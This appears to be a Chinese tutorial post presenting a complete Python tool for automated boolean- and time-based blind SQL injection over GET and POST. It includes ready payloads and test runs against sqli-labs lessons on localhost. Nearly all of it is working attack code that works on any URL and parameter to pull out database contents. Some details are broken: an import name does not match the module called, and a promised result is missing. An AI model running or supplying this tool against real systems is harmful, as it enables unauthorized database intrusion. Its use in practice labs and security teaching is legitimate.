script.py:提供参数,用于调用布尔盲注或时间注入的函数
import time_type
import bool_type
# inject_type: 1.布尔盲注2.时间注入
# http_type:1.GET请求2.POST请求
# dict_para_data:所有的参数,和默认值
# vuln_para:注入的参数
# payloads:注入的内容
if __name__ == '__main__':
# 时间注入POST测试
dict_para_data = {
'uname':'admin',
'passwd':'123',
'submit':'Submit'
}
vuln_para = 'uname'
http_type = 2
url = "http://127.0.0.1/sqli-labs/Less-15/"
expected_time = 1
payloads = [
"admin' and if(substr(database(),",
",1)='",
"',sleep(1),1) # "
]
time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)
time_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_time : 期待等待的时间
def send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time):
# 时间盲注GET
if http_type == 1:
for tmp_para in dict_para_data.keys():
if tmp_para == vuln_para:
dict_para_data[tmp_para] = payload
break
return req.req_by_time_get(dict_para_data, url, expected_time)
# 时间盲注POST
if http_type == 2:
# 替换掉注入的参数的数据为payload
for tmp_para in dict_para_data.keys():
if tmp_para == vuln_para:
dict_para_data[tmp_para] = payload
break
# 返回判断的结果,预期结果为1,否则为0
return req.req_by_time_post(dict_para_data, url, expected_time)
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_time : 期待等待的时间
def brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads):
print('[*] The Time-based blind injection is begin')
brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
brute_list2 = "123456789"
result = ""
# 遍历到字符串第tmp_int个字符
for tmp_int in brute_list2:
# 遍历的字符依次暴力枚举判断
for tmp_char in brute_list1:
payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
# 发送请求,并判断返回结果
if send_payload_by_time(dict_para_data, http_type, vuln_para, payload, url, expected_time) == 1:
result = result + tmp_char
print(f"[*] The finding result: {result}")
if result == "":
print("[*] There is no finding result")
bool_based.py:遍历各个字符,并调用发送请求(GET/POST)函数
import req
# dict_para_data : 参数列表
# http_type : get还是post
# vuln_para : 易受攻击的参数
# payload : 收攻击参数的值
# url
# expected_data : 期待的返回结果
def send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data):
# 布尔盲注GET
if http_type == 1:
# 替换掉注入的参数的数据为payload
for tmp_para in dict_para_data.keys():
if tmp_para == vuln_para:
dict_para_data[tmp_para] = payload
break
# 返回判断的结果,预期结果为1,否则为0
return req.req_by_bool_get(dict_para_data, url, expected_data)
# 布尔盲注POST
if http_type == 2:
for tmp_para in dict_para_data.keys():
if tmp_para == vuln_para:
dict_para_data[tmp_para] = payload
break
# 返回判断的结果,预期结果为1,否则为0
return req.req_by_bool_post(dict_para_data, url, expected_data)
# dict_para_data : 参数列表
# vuln_para : 易受攻击的参数
# http_type : get还是post
# url
# expected_data : 期待的返回结果
def brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads):
print('[*] The Bool-based blind injection is begin')
brute_list1 = "0123456789abcdefghijklmnopqrstuvwxyz"
brute_list2 = "123456789"
result = ""
# 遍历到字符串第tmp_int个字符
for tmp_int in brute_list2:
# 遍历的字符依次暴力枚举判断
for tmp_char in brute_list1:
payload = payloads[0] + tmp_int + payloads[1] + tmp_char + payloads[2]
# 返回的结果为真
if send_payload_by_bool(dict_para_data, http_type, inject_type, vuln_para, payload, url, expected_data) == 1:
result = result + tmp_char
print(f"[*] The finding result: {result}")
if result == "":
print("[*] There is no finding result")
req.py:发送数据包并判断是否为预期结果,如果是则返回1,否则返回0
import requests
import time
# payload : 参数列表
# url
# expected_data : 期待的返回结果
def req_by_bool_get(payload, url, expected_data):
rep = requests.get(url, params=payload)
if expected_data in rep.text:
return 1
else:
return 0
def req_by_bool_post(payload, url, expected_data):
rep = requests.post(url, data=payload)
# print(rep.text)
# print(payload)
if expected_data in rep.text:
return 1
else:
return 0
# payload : 参数列表
# url
# expected_time : 期待等待的时间长短
def req_by_time_get(payload, url, expected_time):
earlier = time.time()
rep = requests.get(url, params=payload)
latter = time.time()
if latter - earlier >= expected_time:
return 1
else:
return 0
def req_by_time_post(payload, url, expected_time):
earlier = time.time()
rep = requests.post(url, data=payload)
latter = time.time()
if latter - earlier >= expected_time:
return 1
else:
return 0
测试1:布尔盲注GET请求
dict_para_data = {
'id' : 'hack123'
}
vuln_para = 'id'
http_type = 1
inject_type = 1
url = "http://127.0.0.1/sqli-labs/Less-8/"
expected_data = 'are in'
payloads = ["1' and substr(database()," , ",1)='" , "' and '1'='1"]
bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)
结果如下:
测试2:布尔盲注POST请求
# 布尔注入POST测试
dict_para_data = {
'uname':'admin',
'passwd':'123',
'submit':'Submit'
}
vuln_para = 'uname'
http_type = 2
inject_type = 1
url = "http://127.0.0.1/sqli-labs/Less-15/"
expected_data = 'flag.jpg'
payloads = ["admin' and substr(database()," , ",1)='" , "' #"]
bool_based.brute_enum_by_bool(dict_para_data, vuln_para, http_type, inject_type, url, expected_data, payloads)
测试3:时间注入GET测试
# 时间注入get测试
dict_para_data = {
'id': 'hack123'
}
vuln_para = 'id'
http_type = 1
url = "http://127.0.0.1/sqli-labs/Less-9/"
expected_time = 1
payloads = [
"1' and if(substr(database(),",
",1)='",
"',sleep(1),1) and '1'='1"
]
time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)
测试4:时间注入POST测试
# 时间注入POST测试
dict_para_data = {
'uname':'admin',
'passwd':'123',
'submit':'Submit'
}
vuln_para = 'uname'
http_type = 2
url = "http://127.0.0.1/sqli-labs/Less-15/"
expected_time = 1
payloads = [
"admin' and if(substr(database(),",
",1)='",
"',sleep(1),1) # "
]
time_based.brute_enum_by_time(dict_para_data, vuln_para, http_type, url, expected_time, payloads)
